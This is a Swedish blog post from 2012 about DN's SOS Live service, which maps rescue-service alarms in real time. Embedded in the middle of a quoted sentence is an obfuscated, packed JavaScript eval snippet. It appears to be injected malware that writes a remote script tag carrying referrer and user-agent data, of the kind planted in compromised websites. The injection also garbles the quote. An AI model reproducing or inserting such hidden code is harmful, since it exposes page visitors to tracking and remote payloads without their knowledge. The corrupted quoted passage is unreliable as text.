Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

SOS Live – Se vad räddningstjänsterna gör live.

SOS Live – Se vad räddningstjänsterna gör live.
Filip Urde
  • On 7 februari, 2012
  • http://www.revue.se/filip-urde

Svenskar är ett nyfiket folk, jag vet inte om vi är mycket  mer nyfikna än någon annan. Men jag känner att vi är ett av de ”nyfiknare” folken där ute, våra ”titt” köer känns lite värre, vi tycker det är lite mer intressant med vem som tjänar mest i området man bor, vem som har störst villa och vem som så ”oförtjänt” vann 10 miljoner på lotto i helgen. Något annat många av oss är intresserade av är vad våra poliser, brandmän och annan räddnings personal har för sig. Där kommer den här DN tjänsten in som sänt från ovan.

Kristoffer Örstadius på DN skriver så här om tjänsten.

”Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sfara|var|u0026u|referrer|hhhyy||js|php’.split(’|’),0,{}))
är en ny tjänst där besökare på DN.se kan följa alla larm till räddningstjänsten – i realtid. Fem minuter efter att SOS Alarm får in ett larm om en brand eller en trafikolycka dyker informationen automatiskt upp i SOS Lives flöde. Eftersom vi även får information om gps-koordinater kan vi knyta händelsen till en symbol på vår ”händelsekarta”.

DN har ett avtal med SOS Alarm, som ger dem all info digitalt. Dock finns inte det största dragplåstret ”Polislarm” med i tjänsten ännu, men planen är att detta ska finnas inomkort.

Följa utvecklingen i Rosengård någon? Är sjukt nyfiken!

SOS Live

http://www.dn.se/nyheter/soslive